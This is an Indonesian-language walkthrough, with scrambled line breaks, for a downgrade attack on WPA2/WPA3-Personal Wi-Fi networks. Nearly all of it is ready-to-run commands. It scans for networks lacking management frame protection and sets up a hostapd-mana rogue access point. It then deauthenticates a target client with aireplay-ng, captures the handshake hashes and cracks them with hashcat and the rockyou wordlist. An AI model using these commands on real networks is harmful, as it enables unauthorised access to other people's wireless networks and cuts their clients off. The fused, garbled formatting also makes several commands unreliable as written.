- Hak akses root (
sudo) - 2 adapter Wi-Fi (support mode monitor & AP)
- Keamanan: WPA2/WPA3-Personal
- PMF: Nonaktif (
0) - Minimal ada 1 client yang aktif
- 4-Way Handshake (minimal M1 & M2)
- File Wordlist
wlan0untuk rogue APwlan1untuk menjalankan serangan deauth
airmon-ng check kill
airmon-ng start wlan1timeout 60 airodump-ng -t wpa -w capture --output-format pcap wlan1tshark -r capture-01.cap -Y "wlan.fc.type_subtype == 8 && (wlan.rsn.akms.type == 2 && wlan.rsn.akms.type == 8) && wlan.rsn.capabilities.mfpr == 0 && wlan.rsn.capabilities.mfpc == 0"nano hostapd-mana.confIsi dengan:
interface=wlan0
driver=nl80211
ssid=[ssid]
channel=[channel]
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=12345678
mana_wpaout=hostapd-mana.hccapx
hostapd-mana hostapd-mana.confaireplay-ng -0 0 -a [bssid] -c [mac_client] wlan1Jika di terminal rogue AP sudah ada hash yang muncul, tekan CTRL+C untuk menghentikan rogue AP.
awk '{print $3}' hostapd-mana.hccapx > hash.txthashcat -a 0 -m 22000 hash.txt /usr/share/wordlists/rockyou.txt